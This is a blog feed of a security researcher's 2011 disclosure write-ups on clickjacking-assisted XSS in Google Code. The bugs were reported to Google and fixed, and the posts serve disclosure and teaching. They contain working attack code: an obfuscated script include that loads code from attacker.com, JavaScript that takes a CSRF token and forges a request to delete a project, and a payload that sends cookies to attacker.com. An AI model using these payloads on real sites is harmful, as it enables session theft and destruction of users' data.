<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-WjRw1hCvwgY/TeM0bqQh5dI/AAAAAAAAASA/RSg2Izt9Km8/s1600/vulnerable-page2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="169" src="http://3.bp.blogspot.com/-WjRw1hCvwgY/TeM0bqQh5dI/AAAAAAAAASA/RSg2Izt9Km8/s320/vulnerable-page2.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<br />
<br />
<br />
<b></b><br />
<b>XSS Exploitation:</b><br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><br />
To exploit this vulnerability, I used HTML5 Drag-Drop API with clickjacking method. Krzysztof Kotowicz has explained this technique very well in his <a href="http://blog.kotowicz.net/2011/03/exploiting-unexploitable-xss-with.html">blog post</a>. I used his “Alphabet Hero” POC with <a href="http://www.beakkon.com/tutorial/html5/drag-and-drop">this</a> HTML5 Drag-Drop tutorial.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-42LMW5_hC0Q/TeM0lEs3bqI/AAAAAAAAASE/e0rpKoGtlG0/s1600/poc1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="http://3.bp.blogspot.com/-42LMW5_hC0Q/TeM0lEs3bqI/AAAAAAAAASE/e0rpKoGtlG0/s320/poc1.JPG" width="320" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<br />
This is basically a drag-drop game where user has been asked to put garbage in a dustbin.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-KWtmlDDzyio/TeM0ofDXeRI/AAAAAAAAASI/p2Gqs0g05Ko/s1600/poc2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="http://3.bp.blogspot.com/-KWtmlDDzyio/TeM0ofDXeRI/AAAAAAAAASI/p2Gqs0g05Ko/s320/poc2.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
The last piece of garbage has XSS payload in ‘data-payload’ attribute and an invisible iframe with vulnerable page as source is following it till it drops the object. The payload used for this POC is : <span style="background-color: #999999;"><img src=1 onerror=’alert(document.domain)’></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kfU8Xrs7WOk/TeM0r-0tdmI/AAAAAAAAASM/o--mJ2c9TpE/s1600/poc3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="http://3.bp.blogspot.com/-kfU8Xrs7WOk/TeM0r-0tdmI/AAAAAAAAASM/o--mJ2c9TpE/s320/poc3.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<br />
<br />
As soon as the object is dropped, a link to publish score has been shown which is on top of the ‘Go’ button from vulnerable page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-bauiSki-Q_Y/TeM0vBfEVzI/AAAAAAAAASQ/FJqmYFYU-b4/s1600/poc4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="http://1.bp.blogspot.com/-bauiSki-Q_Y/TeM0vBfEVzI/AAAAAAAAASQ/FJqmYFYU-b4/s320/poc4.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<br />
<br />
When a victim clicks ‘Score’ button/link, the XSS payload gets executed and pops up an alert box saying ‘code.google.com’.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-GI-nSqjmJqw/TeM0yKFyDFI/AAAAAAAAASU/eM4A6-meSaE/s1600/poc5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="http://3.bp.blogspot.com/-GI-nSqjmJqw/TeM0yKFyDFI/AAAAAAAAASU/eM4A6-meSaE/s320/poc5.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<br />
<br />
<b>Attack: CSRF Protection bypass to delete Google Code Projects with XSS</b><br />
<br />
We know that CSRF protections can be bypassed with XSS. Google has implemented token based CSRF protection for most of the critical actions. One of them is deletion of hosted project in Google Code Project Hosting. The uses are allowed to host their projects on code.google.com domain. The advanced option in every project has ‘Delete Project’ form and it is protected by token.<br />
<br />
Now to conduct this attack successfully, an attacker must know following things:<br />
1. Project Name<br />
2. Valid token<br />
<br />
With above information, an attacker can craft a POST request to following page to delete the project:<br />
<br />
http://code.google.com/p/<project_name>/adminAdvanced.do <br />
<br />
with data as token=<valid_token>&deletebtn=Delete+project<br />
<br />
<br />
This way is only applicable to specific user with specific project name. To make it generic for all Google Code users, I followed this process:<br />
1. Identify username link by requesting <a href="http://code.google.com/">http://code.google.com</a> and extracting ‘projects-dropdown’ element. The result will be link like <a href="http://code.google.com/u/amolnaik4%20">http://code.google.com/u/amolnaik4 </a><br />
2. Request the link found in step-1 and extract ‘owner’ element. This element has links in <a href=<project_link>> tag for all the projects under the user.<br />
3. Request the project link and extract token.<br />
4. Create a form with POST request to <project_link>/adminAdvanced.do with token & button and submit the form.<br />
<br />
This way it’ll be generic for all the users which are visiting the attacker site. When exploiting this, the paper written by <a href="http://www.exploit-db.com/download_pdf/13534">Nytro</a> comes handy.<br />
Following is the JavaScript file the attacker will host on his/her server along with Drag-Drop game.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-mVYF0hXephw/TeM02W1lR3I/AAAAAAAAASY/LDqUs8Zn5HE/s1600/js-file.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="http://2.bp.blogspot.com/-mVYF0hXephw/TeM02W1lR3I/AAAAAAAAASY/LDqUs8Zn5HE/s320/js-file.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<br />
<br />
Let’s see how it works:<br />
Currently victim has 2 projects in his Google Code account.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-IWE5qKFyjdE/TeM09aD4jzI/AAAAAAAAASc/FgX-JXfClBk/s1600/attack1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="http://2.bp.blogspot.com/-IWE5qKFyjdE/TeM09aD4jzI/AAAAAAAAASc/FgX-JXfClBk/s320/attack1.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
The attacker includes the malicious javascript file in XSS payload in HTML5 Drag-Drop game. The payload will looks like this: <span style="background-color: #999999;"><img src=1 onerror='document.write(eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,4747,97,116,116,97,99,107,101,114,46,99,111,109,47,99,111,100,101,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41,59)));'></span><br />
Where the decoded payload looks like: <span style="background-color: #999999;">document.write('<script src="http://attacker.com/code.js"></script>');</span><br />
<br />
When the last item in game is dragged to the dustbin, the above payload will be placed in vulnerable page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-dBVYtqNOgIo/TeM1Ac64XwI/AAAAAAAAASg/YII66nZBnpA/s1600/attack2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="144" src="http://3.bp.blogspot.com/-dBVYtqNOgIo/TeM1Ac64XwI/AAAAAAAAASg/YII66nZBnpA/s320/attack2.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
When victim clicks on ‘Score’ link, the payload starts executing. The first step is to identify user link. The first iframe will request to <a href="http://code.google.com/">http://code.google.com</a> and will get user link with <span style="background-color: #999999;">document.getElementById("iframe").contentDocument.getElementById("projects-dropdown");</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/--gjCrYU45a8/TeMvGgcVN3I/AAAAAAAAARY/RDqpqRIixig/s1600/source-userlink.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="http://2.bp.blogspot.com/--gjCrYU45a8/TeMvGgcVN3I/AAAAAAAAARY/RDqpqRIixig/s320/source-userlink.JPG" width="320" /></a></div><br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-kjyGaKNBhNU/TeM1F8pHA8I/AAAAAAAAASk/X1Xja9AblZg/s1600/attack3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="http://2.bp.blogspot.com/-kjyGaKNBhNU/TeM1F8pHA8I/AAAAAAAAASk/X1Xja9AblZg/s320/attack3.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<br />
<br />
Now the exploit will request the above user link (<a href="http://code.google.com/u/amolnaik4">http://code.google.com/u/amolnaik4</a> ) for project listing and will pick up the first project link.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-5PGtsq2Qi04/TeMvdNatNWI/AAAAAAAAARg/lYqh-SyAelE/s1600/source-projects.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="http://2.bp.blogspot.com/-5PGtsq2Qi04/TeMvdNatNWI/AAAAAAAAARg/lYqh-SyAelE/s320/source-projects.JPG" width="320" /></a></div><br />
To get the first project link, I used <span style="background-color: #999999;">document.getElementById("iframe1").contentDocument.getElementsByName("owner")[0].getElementsByTagName("a")[0].href;</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-f2qWRCkyJak/TeM1Ka98S_I/AAAAAAAAASo/I0cVePOjxb8/s1600/attack4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="http://4.bp.blogspot.com/-f2qWRCkyJak/TeM1Ka98S_I/AAAAAAAAASo/I0cVePOjxb8/s320/attack4.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
The next step is to get the token. The next iframe will request to <a href="http://code.google.com/p/mutest/adminAdvanced">http://code.google.com/p/mutest/adminAdvanced</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-3SYbvcg_h_4/TeMv3bm506I/AAAAAAAAARo/kXemB_KWVRQ/s1600/source-admin.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="http://1.bp.blogspot.com/-3SYbvcg_h_4/TeMv3bm506I/AAAAAAAAARo/kXemB_KWVRQ/s320/source-admin.JPG" width="320" /></a></div><br />
Token will be extracted by <span style="background-color: #999999;">document.getElementById("iframe2").contentDocument.forms[1].token.value;</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-WwnMCNXlQ6k/TeM1OIA2JDI/AAAAAAAAASs/TYoQRv62sv0/s1600/attack5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="http://1.bp.blogspot.com/-WwnMCNXlQ6k/TeM1OIA2JDI/AAAAAAAAASs/TYoQRv62sv0/s320/attack5.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<br />
<br />
<br />
Now simply craft a POST form and submit. The following lines used to do this:<br />
<br />
<span style="background-color: #999999;">document.writeln('<form width="0" height="0" method="POST" action="'+x+'adminAdvanced.do">'); document.writeln('<input type="hidden" name="token" value="' + token + '" />'); document.writeln('<input type="hidden" name="deletebtn" value="Delete+project" />'); document.writeln('</form>'); document.forms[0].submit();</span><br />
<br />
where x is the project link (http://code.google.com/p/mutest/)<br />
<br />
Done!! The first project is scheduled for deleted.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-tM3pVSIWXJI/TeM1VlmX8gI/AAAAAAAAASw/cYYNUINDvdk/s1600/attack6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://4.bp.blogspot.com/-tM3pVSIWXJI/TeM1VlmX8gI/AAAAAAAAASw/cYYNUINDvdk/s320/attack6.JPG" width="320" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-AyggIoPC5wk/TeM1YVp9H2I/AAAAAAAAAS0/ZTroS8HtoFI/s1600/attack7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="http://1.bp.blogspot.com/-AyggIoPC5wk/TeM1YVp9H2I/AAAAAAAAAS0/ZTroS8HtoFI/s320/attack7.JPG" width="320" /></a></div><br />
The attacker can iterate through all the projects under the victim account and can schedule for deletion. <br />
<br />
TimeLine:<br />
<br />
Bug discovered:11th April 2011<br />
Reported to Google: 13th April 2011<br />
Bug fixed by Google: 25th April 2011<br />
Public Disclosure: 30th April 2011<br />
<br />
</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com1tag:blogger.com,1999:blog-1544325078740292092.post-45710477005052248012011-03-22T00:12:00.000-07:002011-03-22T07:50:19.944-07:00Exploitation of “Self-Only” Cross-Site Scripting in Google Code<div dir="ltr" style="text-align: left;" trbidi="on">As an attempt to contribute for <a href="http://googleonlinesecurity.blogspot.com/2010/11/rewarding-web-application-security.html">Google’s Rewarding Web Application Security Research</a>, I started working on Google Code in search of vulnerabilities that could qualify for the reward program. That is where I came across a Cross-site Scripting bug which seems “not exploitable” at first. As Google has patched the vulnerable pages, I’m going to explain the exploitation of this bug here.<br />
<br />
<br />
<span style="font-size: large;"><b>“Self-Only” Cross-Site Scripting</b></span><br />
<br />
<b>“Self-Only” XSS</b> term is referred in past by many researchers for “<b>CSRF Protected XSS</b>”. You can read it <a href="http://kuza55.blogspot.com/2008/02/exploiting-csrf-protected-xss.html">here</a> and <a href="http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/">here</a>. The issue I found in Google Code site was not related to “CSRF protected XSS”. I referred this bug as “Self-Only” XSS due to its nature because this was not a GET or POST XSS and was only exploited by the victim. This means that the victim has to type “<span style="background-color: #666666;"><span style="background-color: #999999;"></span><span style="background-color: #cccccc;"><script>alert(document.cookie)</script></span></span>” in the input box and click “Go!” to get his own cookies. Confused! OK. I’ll try to explain this with Google Code example.<br />
<br />
<br />
<span style="font-size: large;"><b>Cross-Site Scripting in Google Code</b></span><br />
<br />
Google Code hosts the documentation for Google APIs. The Google MAP API documentation includes the examples pages to demonstrate different map functions. One of them is “Simple Geocoding” example. The link for this page is:<br />
<br />
<div style="background-color: #cccccc;"><a href="http://code.google.com/intl/es-MX/apis/maps/documentation/javascript/v2/examples/geocoding-simple.html">http://code.google.com/intl/es-MX/apis/maps/documentation/javascript/v2/examples/geocoding-simple.html</a></div><br />
This page displays geo-location of the requested location on the map. The page makes a GET request to Google Map API and displays the result.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh5.googleusercontent.com/-VI-sJivVszE/TYhEpByokGI/AAAAAAAAAOs/gTolStxIoAE/s1600/main-page.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://lh5.googleusercontent.com/-VI-sJivVszE/TYhEpByokGI/AAAAAAAAAOs/gTolStxIoAE/s400/main-page.JPG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><br />
When requested with a valid location followed by XSS payload e.g. <span style="background-color: #cccccc;">pune<script>alert(document.cookie)</script></span>, makes following GET request to Google Map API :<br />
<br />
<div style="background-color: #cccccc;">http://map.google.com/maps/geo?output=json&oe=utf-8&q=pune%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&key=ABQIAAAAzr2EBOXUKnm_jVnk0OJI7xSosDVG8KKPE1-m51RBrvYughuyMxQ-i1QfUnH94QxWIa6N4U6MouMmBA&mapclient=jsapi&hl=en&callback=</div><br />
Google Map API returns JSON response to the request as below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh6.googleusercontent.com/-FZki8lRfM-s/TYhF8xeiDNI/AAAAAAAAAO0/34283q6Mxj4/s1600/json-request.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://lh6.googleusercontent.com/-FZki8lRfM-s/TYhF8xeiDNI/AAAAAAAAAO0/34283q6Mxj4/s400/json-request.JPG" width="400" /></a></div><br />
This response is rendered by the example page at Google Code as below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh4.googleusercontent.com/-YZreh7BbGR4/TYhGahp1H3I/AAAAAAAAAO4/JeSNJpx4UeU/s1600/dom-source.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://lh4.googleusercontent.com/-YZreh7BbGR4/TYhGahp1H3I/AAAAAAAAAO4/JeSNJpx4UeU/s400/dom-source.JPG" width="400" /></a></div><br />
And executes the payload in victim’s browser:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh6.googleusercontent.com/-8TIJWx8VjlQ/TYhHQaJENOI/AAAAAAAAAO8/fzVAk-JTBA8/s1600/xss-poc.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://lh6.googleusercontent.com/-8TIJWx8VjlQ/TYhHQaJENOI/AAAAAAAAAO8/fzVAk-JTBA8/s400/xss-poc.JPG" width="400" /> </a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><br />
</div>This is due to lack of sanitization of malicious data while rendering the output back to the example page.<br />
<br />
A quick analysis for request/response reveals that this XSS cannot be exploited by classical GET or POST method. As an attacker, we cannot control any request that can be used to craft payload and when sent to the victim, it executes in his/her browser. For successful attack, the victim has to type himself/herself XSS payload in the vulnerable input box and click “Go!” button. That is what I referred as <b>“Self-Only” XSS</b>.<br />
<br />
<span style="font-size: large;"><b>Exploitation</b></span><br />
<br />
During the discussion with <a href="http://twitter.com/lavakumark">Lavakumar</a>, he suggested to check for possible Clickjacking with HTML5 Drag and Drop exploit.<br />
<br />
The target page was vulnerable to clickjacking and after spending few hours, I was able to craft a working POC for this attack. Here is the scenario and details:<br />
<br />
An attacker hosts a Drag and Drop game which convince the victim to perform Drag and Drop operations. The game page renders the vulnerable Google Code page in an invisible iframe. It also has an element link this:<br />
<br />
<div style="background-color: #cccccc;"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Evil data')“><h3>DRAG ME!!</h3></div></div><br />
When the victim starts dragging this, the event’s data value is set to ‘Evil Data’. Victim drops the element on to a text field inside an invisible iframe which populates the ‘Evil Data’. Victim clicks a dummy button which is placed onto the “Go!” button from vulnerable page.<br />
<br />
This is how the PoC looks like:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh6.googleusercontent.com/-T5PfdVTYoAk/TYhJDxdKG1I/AAAAAAAAAPA/7-usSY43V60/s1600/poc1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://lh6.googleusercontent.com/-T5PfdVTYoAk/TYhJDxdKG1I/AAAAAAAAAPA/7-usSY43V60/s400/poc1.JPG" width="400" /></a></div><br />
The victim drags the text to input field which holds the XSS payload.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-v45mRsJGgi0/TYhJVxsD_KI/AAAAAAAAAPE/pfRkU_vZka4/s1600/poc2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="153" src="https://lh3.googleusercontent.com/-v45mRsJGgi0/TYhJVxsD_KI/AAAAAAAAAPE/pfRkU_vZka4/s400/poc2.JPG" width="400" /></a></div><br />
Then he/she clicks on the “Go!!” button.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh5.googleusercontent.com/-GunomnWCSgE/TYhJkVw3QCI/AAAAAAAAAPI/4NXiB3M15-M/s1600/poc3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://lh5.googleusercontent.com/-GunomnWCSgE/TYhJkVw3QCI/AAAAAAAAAPI/4NXiB3M15-M/s400/poc3.JPG" width="400" /></a></div>Bingo!!<br />
<br />
<br />
<span style="font-size: large;"><b>The Attack – Cookie Stealing</b></span><br />
<br />
By changing the ‘Evil Data’ in Drag and Drop element, pointed to the attacker’s cookie grabbing script, a successful cookie stealing attack can be performed.<br />
<br />
<div style="background-color: #cccccc;"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '<script>document.location=\'http://attacker.com/google/grab.php?cookie=\'+document.cookie</script>')"><h3>DRAG ME!!</h3></div></div><br />
<br />
<span style="font-size: large;"><b>The Reward</b></span><br />
<br />
Google security team has appreciated my efforts and put me on the <a href="http://www.google.com/corporate/halloffame.html">Google Security Hall of Fame</a>.<br />
<br />
Special thanks to <a href="http://twitter.com/lavakumark">Lavakumar</a>!!<br />
<br />
<span class="Apple-style-span" style="color: #333333; font-family: Georgia, serif; font-size: 13px; font-weight: bold;"><a href="http://blog.kotowicz.net/2011/03/exploiting-unexploitable-xss-with.html" id="dsq-author-user-166829397" rel="nofollow" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #cc6600; display: inline; font-style: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; max-width: none; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; text-decoration: underline; text-indent: 0px; width: auto;" target="_blank">kkotowicz</a> </span><span class="Apple-style-span" style="color: #333333; font-family: Georgia, serif; font-size: 13px;">had explained the same issue really well.</span><br />
<br />
<span style="font-size: large;"><b>Timeline</b></span><br />
<br />
<b>Bug discovered:</b>15th Feb 2011<br />
<b>Bug Reported to vendor:</b> 21st Feb 2011<br />
<b>Public Disclosure:</b> 21st Mar 2011<br />
<br />
<span class="Apple-style-span" style="font-family: Georgia, serif; font-size: x-small;"><b><br />
</b></span></div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com3tag:blogger.com,1999:blog-1544325078740292092.post-61348825591703679332011-03-21T23:28:00.000-07:002011-03-21T23:28:28.310-07:00First Post<div dir="ltr" style="text-align: left;" trbidi="on">This is the time to create a blog and start blogging. So here is my blog.<br />
I'll be discussing here my thoughts, work in Security.<br />
<br />
Happy blogging...!!!</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com0